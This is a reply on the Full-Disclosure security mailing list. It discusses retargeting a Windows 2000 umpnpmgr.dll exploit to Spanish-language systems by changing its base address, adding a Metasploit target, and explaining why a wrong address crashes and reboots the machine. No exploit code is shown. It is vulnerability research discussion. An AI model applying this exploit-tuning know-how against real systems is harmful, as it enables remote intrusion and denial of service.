-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Sanjay Rawat wrote:
I too observed the same thing. i am running a windows 2K, SP4. i found
that base address of UMPNPMGR.DLL is 0x767a0000. however, when i run the
attack with this address, the target machine got rebooted (a crash).
this may be, because umpnpmgr.dll is a part of "service.exe", therefore,
on failure, it reboots. but with the unchanged base address, it worked
perfectly. so now the same code can be used for DoS also!!!
You are simply crashing "services" proccess because EIP is not reaching
the right instructions (eg: pop;pop;ret) or (depending on process'
memory layout) it's referencing an invalid address. When Windows detects
the crash, it reboots (since it lacks an important system component).
This is a side effect. Anyway, if you have a shell, why do you want a
simple DoS? :)
In order to clarify:
- - my hacked hod's exploit changed "destination EIP" to match Spanish
systems. So it will NOT work on English systems (call it "DoS"; I prefer
to name it "didn't work" ;-)). And that's why appended "-spanish" to
filename.
- - for Metasploit module, I simply added a new "target", so it supports
both English (target 0) and Spanish (target 1). It can be directly
copied to "exploits" directory on Metasploit source-tree. That's the
reason I didn't change filename in this case (hdm: feel free to add it
to Metasploit).
Finally, the purpose of my post was not only to add a new target to an
exploit (ml would be fastly flooded with tons of similar mails, if every
people did it... so please, don't do it, I'm a bad example :-(), but to
bring attention over the base address issue and try to learn from you,
guys :). Indeed, I still have some questions:
- - which is the connection between different languages' Windows, if there
is any? (for instance, ad@class101.org suggested that "french offets are
like the deutsch") (btw, I didn't change the offset but the base
address, which is a different thing)
- - any more or less accurate list of connections/links in Windows across
different languages? Or perhaps it's something fairly random?
PS: You could write directly to me and I'll summarize responses
(different base addresses for the exploit are welcome; I don't think
it's appropiate to flood the mailing-list with this...).
- --
Regards,
- -Roman
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (MingW32)
iD8DBQFDDwzF5H+KferVZ0IRAu65AKCQC9nsb1VjzmooamBTWKZeEUS7sgCgjTwe
BAz1iweHkMIgPq0pQaCW99s=
=4fg1
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
